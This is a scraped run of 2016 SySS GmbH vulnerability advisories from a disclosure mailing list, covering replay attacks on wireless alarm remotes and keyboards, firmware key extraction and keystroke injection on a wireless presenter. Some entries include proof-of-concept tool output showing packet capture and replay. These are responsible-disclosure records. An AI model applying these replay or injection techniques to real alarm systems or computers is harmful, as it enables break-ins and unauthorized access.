the used 433 MHz radio communication, the wireless alarm system M2B GSM is vulnerable to replay attacks. Vulnerability Details: SySS GmbH found out that the radio communication protocol used by the M2B GSM wireless alarm system and its remote control is not protected against replay attacks. Therefore, an attacker can record the radio signal of a wireless remote control, for example using a software defined radio, when the alarm system is disarmed by its owner, and play it back at a later time in order to disable the alarm system at will. Proof of Concept (PoC): SySS GmbH build a small device that is able to perform replay attacks against the 433 MHz radio communication of the M2B GSM wireless alarm system, for example in order to arm and disarm the wireless remote system in an unauthorized manner. Solution: Do not use the 433 MHz remote control to arm or disarm the system. Instead it is recommended to use the app for iOS and Android smartphones or to arm and disarm the system manually with the on-board keypad. (Solution as suggested by the vendor.) Disclosure Timeline: 2016-07-05: Vulnerability reported to manufacturer 2016-10-13: Response from the vendor with the solution on how to mitigate the risk 2016-11-23: Public release of security advisory References: [1] M2B GSM Wireless Alarm System, Multi Kon Trade http://multikontrade.de/GSM-Funk-Alarmanlage [2] PT2260 Remote Control Encoder, Princeton Technology Corp. http://www.princeton.com.tw/Portals/0/Product/PT2260_4.pdf [3] SySS Security Advisory SYSS-2016-066 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-066.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Gerhard Klostermeier of SySS GmbH. E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7 Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNCg9AAoJENmkv2o0rU2rtIMP/3OZVr9igvbqmDaOWyvdQbkS q5wF+qf48ACbeqzWJHbzp7y5GE+hsvuMvnpLa2JMwg8E+Wqo7P9/TBKJ/F/W8YRb b2skOQFDuuF3CNG1Uco+hDhPs1FvWVAtOy+YUPPI45IMm+/hOXTRttosns++ZSug GGW8AOtr1KdNQc4UWm0Xex/d71mpP+a1Y4zKTQXXoIw1i2zSxloX1pv/n+WYyRho CKOmfaZnzNAakrmHjfQAMYzUk9Ed30H8YA6Y80QwJgns+LqYGu3updNpD8u4cabq cDC0YOrnyOVuLZgr6itVq6kNu5jPhVkM7ECuTdHWkZOrS1gArti6by5um/xtmO7U fpBjUNtIxqj6yymkkGZ3HK3nxtvlfJk2zqwwJA+z0j1YyzpZwIHB7EUqe/lsiDVx Fu1OGURRlbU2ES3LFfKWwG3S4ZQSa7sI6CZFJjMR8m9E3UNSwYLhMisK8FuooY4A xFOusWlNTj6yPMUe2RXoCUD8lmbOJpPUqIbzfIcK4ek2xGtwWb/9AkmSJhxrFcEg ktCFV2DzFCwkgfYjrKPx4baOpFWYh+A99YzK8rDqVkWTsOSAV/M9NON3jiN3Ai46
[FD] [SYSS-2016-071] Blaupunkt Smart GSM Alarm SA 2500 Kit - Missing Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-071 Product: Smart GSM Alarm SA 2500 Kit Manufacturer: Blaupunkt Affected Version(s): v1.0 Tested Version(s): v1.0 Vulnerability Type: Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-07-14 Solution Date: - Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Matthias Deeg (SySS GmbH) Overview: The Blaupunkt Smart GSM Alarm SA 2500 Kit is a wireless alarm system with different features. The manufacturer describes the product as follows (see [1]): "Home is priceless. Protecting home should be anyone's top priority. Blaupunkt Smart Alarm Series SA 2500/ SA 2700 Kit offers you an easy and efficient way to do 'DIY security, DIY protection.' You can set up a quality security system all by yourself and control/monitor your home from your smartphone anytime, anywhere." Due to an insecure implementation of the used 868 MHz radio communication, the wireless alarm system Blaupunkt Smart GSM Alarm SA 2500 Kit is vulnerable to replay attacks. Vulnerability Details: SySS GmbH found out that the radio communication protocol used by the Blaupunkt Smart GSM Alarm SA 2500 wireless alarm system and its remote control is not protected against replay attacks. Therefore, an attacker can record the radio signal of a wireless remote control, for example using a software-defined radio, when the alarm system is disarmed by its owner, and play it back at a later time in order to disable the alarm system at will. Proof of Concept (PoC): SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio and disarm a Blaupunkt Smart GSM Alarm SA 2500 wireless alarm system in an unauthorized way. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-07-14: Vulnerability reported to manufacturer via e-mail and a ticket in the Blaupunkt customer service portal 2016-07-14: Received an e-mail from the manufacturer confirming the ticket 2016-07-15: Manufacturer closed the ticket without any further notification or solution regarding the reported security vulnerability 2016-11-23: Public release of security advisory References: [1] Blaupunkt Smart GSM Alarm Series SA 2500/SA 2700 KIT http://www.blaupunkt.com/uploads/tx_ddfproductsbp/2500-2700_39.pdf [2] SySS Security Advisory SYSS-2016-071 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-071.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNChPAAoJENmkv2o0rU2rnc4P/ihKlrRMJuTtJo3y72pi8i7O Y/FrOpcUn8zW04PGUBBIC2YK4GfhMfjIQCHY74TNEdGWOMY4lshvbsN9mY2ChSvx MnIllcklXHGbEAAyuu8LafnXVSVIHQtSsCV0H0XPoOhZxj0u5CzziK2xUIYCwcsp fRO0+67PQzUtx9HebiR/sf/fJZj6KdrgLbN2PLQeeZRd6QWDNnF2C5IdBScrFKB3 cVS4AkhuybIwq9LUluIUr3UiA5G8fVSEUbjs7kym2LrLw00ZsJRQxYusIVcJF+Aw nP0fHj1/ybCMlqQmGMtHKGqsxScHf7lflXhfkLbjic6eJmsJxeV3XIWDLV98D455 /bHyhVHDsiYHbhbPVV7FVBPnmbGKzJ/y2RNInkGpkMJN79tLeJZqNOuZv4AH7MYg nswPMxVpmyMixv9RA3K6t7Zv/EyQruMhOvvtfR4ib3GQFO/68O+Jzvc0eQbm2gfF OxM1BeU8HfWEP0FTz+B6h2945ms3N6gsbua4RZUJ1kJDibyIhzww7hIclvlCpo2D 5fPwoWMoT7qV+GAB/RXh9putNcVgk5fIuKAfjcpUwJegv/DDZ6KO2am05OZSRvS/ I6+Oaq4F8RwFKR3j28GJT3gxm++oJ/TOPE+sVF3vD3rZz3wOolMl46K2eD1Sh3/7 QvdQCxoqw2TR+xOL3LkL =0Wia --
[FD] [SYSS-2016-106] EASY HOME Alarmanlagen-Set - Missing Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-106 Product: EASY HOME Alarmanlagen-Set Manufacturer: monolith GmbH Affected Version(s): Model No. MAS-S01-09 Tested Version(s): Model No. MAS-S01-09 Vulnerability Type: Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-09-26 Solution Date: - Public Disclosure: 2016-11-23 CVE Reference: Not yet assigned Author of Advisory: Matthias Deeg (SySS GmbH) Overview: The EASY HOME MAS-S01-09 is a wireless alarm system with different features sold by ALDI SÜD. Some of the features as described in the German product manual are (see [1]): " - - Alarmanlagen-Set mit drahtlosen Sensoren und Mobilfunk-Anbindung - - SOS-Modus, Stiller Alarm, Überwachungs- und Intercom-Funktion - - Integrierte Quad-Band Mobilfunkeinheit für GSM-Netze im 850 / 900 / 1800 / 1900 MHz-Bereich - - Alarmbenachrichtigung auf externe Telefone - - Eingebaute Sirene (ca. 90 dB), inkl. Anschluss für externe Sirene - - Unterstützung für bis zu 98 kabellosen Sensoren / bis zu 4 kabelgebundene Sensoren - - Stromausfallsicherung der Basiseinheit durch 4 x AAA Alkaline-Batterien - - Fernbedienbar per Telefon " Due to an insecure implementation of the used 433 MHz radio communication, the EASY HOME MAS-S01-09 wireless alarm system is vulnerable to replay attacks. Vulnerability Details: SySS GmbH found out that the radio communication protocol used by the EASY HOME MAS-S01-09 wireless alarm system and its remote control is not protected against replay attacks. Therefore, an attacker can record the 433 MHz radio signal of a wireless remote control, for example using a software-defined radio, when the alarm system is disarmed by its owner, and play it back at a later time in order to disable the alarm system at will. Proof of Concept (PoC): SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio and disarm an EASY HOME MAS-S01-09 wireless alarm system in an unauthorized way. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability concerning the tested product version. For further information please contact the manufacturer. Disclosure Timeline: 2016-09-26: Vulnerability reported to manufacturer 2016-09-30: Manufacturer responds to reported security issue and that the information will be integrated in the next product version 2016-09-30: E-mail to manufacturer concerning a security advice in the product manual 2016-10-04: Response concerning security advice in product manual 2016-11-23: Public release of security advisory References: [1] Product manual of EASY HOME MAS-S01-09 wireless alarm system http://monolith-shop.de/wp-content/uploads/2016/09/MAS-S01-09_Alarmanlage_Bedienungsanleitung.pdf [2] SySS Security Advisory SYSS-2016-106 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-106.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -BEGIN PGP SIGNATURE- iQIcBAEBCgAGBQJYNChqAAoJENmkv2o0rU2rznUP/R2Pg/9Dkc3GPJDKGd1HTaSo AC/qluqMjGs8FcPj03WPewT2MlTRBLdkEsgP9kUluC8ohvPS6ybBsogTjcNPQ+vp Qu0gqbhPohTv2VcRlMFAlLycuv2jG56OZ9H6hyNxhCTb8rY8RUI1Ox8R+KQEEFTW fASLsoGt6aRRucHSQW0v/W8MfAVM4oo7JGTt5NG5aJ6Fl7pzJJ2a31KZ/lFnAXo3 4WJf5z3WbiHVb9nHs9d95+RrbCQWOAi34VRvlENlc6Sw6dYQ6QvaC0L+SA7CKhbe z0qy0xiz0H14ISnX+7MeVQzvw/MFCA75qRljMoTNVxM3Sm8jxEh7KxYIXL9/KdY6 e76zGYo70YUYRq5lvwI9YRtcTWELzEQ5kanD0W0f8BnrT76l3DDFiCprK4By8dwP rxJKj
[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks
Advisory ID: SYSS-2016-068 Product: Wireless Keyboard Set LX901 Manufacturer: Fujitsu Affected Version(s): Model No. GK900 Tested Version(s): Model No. GK900 Vulnerability Type: Cryptographic Issues (CWE-310) Missing Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-07-07 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "The Wireless Keyboard LX901 is a top of the line desktop solution for lifestyle orientated customers, who want only the best for their desk. This superb keyboard set offers ambitious users more functions, security and better features than a conventional interface device. It even includes 2.4 GHz technology and 128 AES encryption for security." Due to an insecure implementation of the encrypted data communication, the wireless keyboard LX901 is vulnerable to replay attacks. Vulnerability Details: The SySS GmbH found out that the wireless keyboard Fujitsu LX901 is prone to replay attacks. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data at will causing the same effect as the original data communication. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and thereby gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio in combination with the software tool GNU Radio Companion. Solution: According to information from the manufacturer Fujitsu, the reported security issue will currently not be fixed in affected products. The written statement in German from Fujitsu regarding this security issue is as follows: "Vielen Dank für Ihre Informationen zu unserer Funktastatur. Wie Ihnen bereits mitgeteilt, halten wir das von Ihnen beschriebene Angriffsszenario bei unserer Tastatur aufgrund des verwendeten Funkprotokolls unter realen Bedingungen für nicht so einfach durchführbar. Wie erwähnt, verkaufen wir mit unserer Tastatur keine Sicherheitslösung, sondern eine Komfortlösung (ohne gravierende Sicherheitsnachteile wie bei unverschlüsselten Wireless-Tastaturen). In einem bereits geplanten Nachfolgeprodukt werden alle neuen Erkenntnisse zur sicheren Datenübertragung bei Funktastaturen einfließen." The English translation of this statement is as follows: "Thank you very much for your information about our wireless keyboard. As we have already pointed out, we believe that the described scenario is not easy to perform under real conditions due to the radio protocol used. As mentioned, our product is not destined to sell security, but convenience in the first place (without the security drawbacks of unencrypted wireless keyboards). Any new information and insights will be incorporated into the already planned successor product." Disclosure Timeline: 2016-07-07: Vulnerability reported to manufacturer 2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory 2016-08-02: E-mail from manufacturer requesting further information 2016-08-04: Provided further information to manufacturer via e-mail 2016-08-05: E-mail from manufacturer with further questions 2016-08-08: E-mail to manufacturer with answers to open questions 2016-08-12: E-mail from manufacturer with statement regarding the reported security issue 2016-10-05: Public release of the security advisory References: [1] Product website for Fujitsu Wireless Keyboard Set http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/w
[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-033 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-04-22 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to the insufficient protection of the flash memory of the keyboard and of the USB dongle, an attacker with physical access has read and write access to the firmware and the used cryptographic key. Vulnerability Details: The SySS GmbH found out that the embedded flash memory of the wireless keyboard Microsoft Wireless Desktop 2000 and of the corresponding USB dongle can be read and written via the SPI interface of the used transceivers with an embedded microcontroller nRF24LE1H (keyboard) and nRF24LU1+ (USB dongle) as the flash memory is not protected by the offered read back protection feature (RDISMB - Read DISable Main Block). Thus, an attacker with physical access to the keyboard or the USB dongle can simply read and write the SPI-addressable code and data flash memory. Due to the use of nRF24 transceiver versions with one-time programmable memory, write access is limited in such a way that a set 1 bit can be changed to a 0 bit but not vice versa. The AES cryptographic key used by the Microsoft Wireless Desktop 2000 keyboard and the corresponding USB dongle is for both devices accessible via the SPI interface. By having read and write access to the code and data flash memory, an attacker can either extract the cryptographic key, for instance to perform further attacks against the wireless communication, or modify the firmware or the cryptographic key in a limited way due to the used one-time programmable memory. Proof of Concept (PoC): The SySS GmbH could successfully read the contents of the code and data flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the USB dongle using the hardware tool Bus Pirate [3] in combination with the software tool nrfprog [4]. Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-04-22: Vulnerability reported to manufacturer 2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory 2016-06-06: E-mail to manufacturer according current status 2016-06-27: Another e-mail to manufacturer according current status 2016-06-27: E-mail from manufacturer requesting further information 2016-06-28: Provided further information and PoC software tool 2016-07-07: E-mail from manufacturer with further information and question about intended disclosure 2016-07-08: E-mail to manufacturer concerning the planned responsible disclosure 2016-08-04: E-mail from manufacturer concerning limitations of actual attacks 2016-10-05: Public release of the security advisory References: [1] Product website for Microsoft Wireless Desktop 2000 https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1 [2] Website of Bus Pirate hardware tool http://dangerousprototypes.com/docs/Bus_Pirate [3] nrfprog Github repository https://github.com/nekromant/nrfprog [4] SySS Security Advisory SYSS-2016-033 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Gerhard Klostermeier and Matthias Deeg of the SySS GmbH. E-Mail: gerhard.klostermeier (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-043 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Cryptographic Issues (CWE-310) Insufficient Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-05-19 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to an insecure implementation of the encrypted data communication, the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay attacks with certain restrictions. Vulnerability Details: The SySS GmbH found out that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data causing the same effect as the original data communication. According to test results of the SySS GmbH, the Microsoft Wireless Desktop 2000 keyboard and its USB dongle have implemented a replay protection based on an incrementing packet counter. But the used window for valid packet counter values is large enough to perform a replay attack if there were not too many data packets caused by further keystrokes between the attacker's recording and the playback. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and by this gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output exemplarily illustrates a replay attack with the recorded data packets for the word "test". # python simple_replay.py Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure radio [*] Start recording. Press <CTRL+C> to stop recording ... [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 083816016234008e [+] Received data: 083816016234008e [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 0838160164340088 [+] Received data: 0838160164340088 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2 [+] Received data: 0838160168340084 [+] Received data: 0838160168340084 [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d ^C [*] Stop recording [*] Press to replay the recorded data packets or <CTRL+C> to quit ... [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 083816016234008e [+] Send data: 083816016234008e [+] Send data: 099816016ae20e05e28d72
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
Advisory ID: SYSS-2016-043 Product: Microsoft Wireless Desktop 2000 Manufacturer: Microsoft Affected Version(s): Ver. A Tested Version(s): Ver. A Vulnerability Type: Cryptographic Issues (CWE-310) Insufficient Protection against Replay Attacks Risk Level: Medium Solution Status: Open Manufacturer Notification: 2016-05-19 Solution Date: - Public Disclosure: 2016-10-05 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH) Overview: Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]): "This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air." Due to an insecure implementation of the encrypted data communication, the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay attacks with certain restrictions. Vulnerability Details: The SySS GmbH found out that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded communication data causing the same effect as the original data communication. According to test results of the SySS GmbH, the Microsoft Wireless Desktop 2000 keyboard and its USB dongle have implemented a replay protection based on an incrementing packet counter. But the used window for valid packet counter values is large enough to perform a replay attack if there were not too many data packets caused by further keystrokes between the attacker's recording and the playback. A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of his or her victim, for instance during a login to the operating system or during unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer and replays the previously recorded AES-encrypted data communication for the password-based user authentication and by this gets unauthorized access to the victim's system. Proof of Concept (PoC): The SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output exemplarily illustrates a replay attack with the recorded data packets for the word "test". # python simple_replay.py Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure radio [*] Start recording. Press <CTRL+C> to stop recording ... [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Received data: 083816016234008e [+] Received data: 083816016234008e [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4 [+] Received data: 0838160164340088 [+] Received data: 0838160164340088 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 099816019703529705956290664c0cda94ab28b6 [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 0998160168690f3817261c9e068577dd450a245a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 083816016634008a [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4 [+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2 [+] Received data: 0838160168340084 [+] Received data: 0838160168340084 [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d ^C [*] Stop recording [*] Press to replay the recorded data packets or <CTRL+C> to quit ... [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6 [+] Send data: 083816016234008e [+] Send data: 083816016234008e [+] Send data: 099816016ae20e05e28d725888c4ede685f918e7 [+] Send data: 099816016ae20e05e28d72
[FD] [SYSS-2016-074] Logitech Wireless Presenter R400 - Insufficient Verification of Data Authenticity (CWE-345), Keystroke Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2016-074 Product: Wireless Presenter R400 Manufacturer: Logitech Affected Version(s): Model R-R0008 Tested Version(s): Model R-R0008 Vulnerability Type: Insufficient Verification of Data Authenticity (CWE-345) Keystroke Injection Vulnerability Risk Level: High Solution Status: Open Manufacturer Notification: 2016-08-12 Solution Date: - Public Disclosure: 2016-10-12 CVE Reference: Not yet assigned Authors of Advisory: Matthias Deeg (SySS GmbH) Overview: Logitech R400 is a wireless presenter using 2.4 GHz radio communication. The manufacturer describes the product as follows (see [1]): "Intuitive controls and red laser pointer make presentations a snap, even in the darkest auditoriums." Due to unencrypted and unauthenticated data communication, the wireless presenter Logitech R400 is prone to keystroke injection attacks. Vulnerability Details: The SySS GmbH found out that the wireless presenter Logitech R400 is vulnerable to keystroke injection attacks. An attacker can analyze the unencrypted and unauthenticated data packets of the 2.4 GHz radio communication sent by the wireless presenter to the receiver (USB dongle) in order to learn the used protocol. By knowing the used data protocol, it is possible to inject packets in the data communication that are actually interpreted as keystrokes by the receiver on the target system. Thus, an attacker is able to send arbitrary keystrokes to a victim's computer system, for example in order to install malware when the target system is unattended. In this way, an attacker can remotely take control over the victim's computer that is operated with an affected receiver of a Logitech R400 wireless presenter. Proof of Concept (PoC): The SySS GmbH could successfully perform keystroke injection attacks against the wireless presenter Logitech R400 using an in-house developed software tool in combination with the USB radio dongle Crazyradio PA and the nrf-research-firmware by Bastille Networks Internet Security (see [2] and [3]). The following output of the developed proof-of-concept software tool illustrates a successful attack: # python logitech_presenter.py -a 77:E3:96:AC:07 _ __ ___ _ _ _ _ _ | __ \| |__ \| || | | __ \| || | _ __ | |__) | |__ ) | || |_ | |__) | | __ _ _ _ ___ ___| |_ | '_ \| _ /| __| / /|__ _| | ___/| |/ _` | | | / __|/ _ \ __| | | | | | \ \| | / /_ | | | || | (_| | |_| \__ \ __/ |_ |_| |_|_| \_\_||| |_| |_||_|\__,_|\__, |___/\___|\__| __/ | |___/ Logitech Wireless Presenter Attack Tool v1.0 by Matthias Deeg - SySS GmbH (c) 2016 [*] Configure nRF24 radio [*] Scanning for Logitech wireless presenter ... [+] Found nRF24 device with address 77:E3:96:AC:07 on channel 32 [*] Press <CTRL+C> to start keystroke injection ^C [*] Start keystroke injection ... [*] Done. Solution: The SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer. Disclosure Timeline: 2016-08-12: Vulnerability reported to manufacturer 2016-10-12: Public release of the security advisory References: [1] Product website for Logitech R400 http://www.logitech.com/en-us/product/wireless-presenter-r400 [2] Product website for Crazyradio PA https://www.bitcraze.io/crazyradio-pa/ [3] Bastille's nRF24 research firmware and tools https://github.com/BastilleResearch/nrf-research-firmware [4] SySS Security Advisory SYSS-2016-074 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-074.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ Credits: This security vulnerability was found by Matthias Deeg of the SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provi
[FD] [SYSS-2016-075] Targus Multimedia Presentation Remote - Insufficient Verification of Data Authenticity (CWE-345), Mouse Spoofing Attack
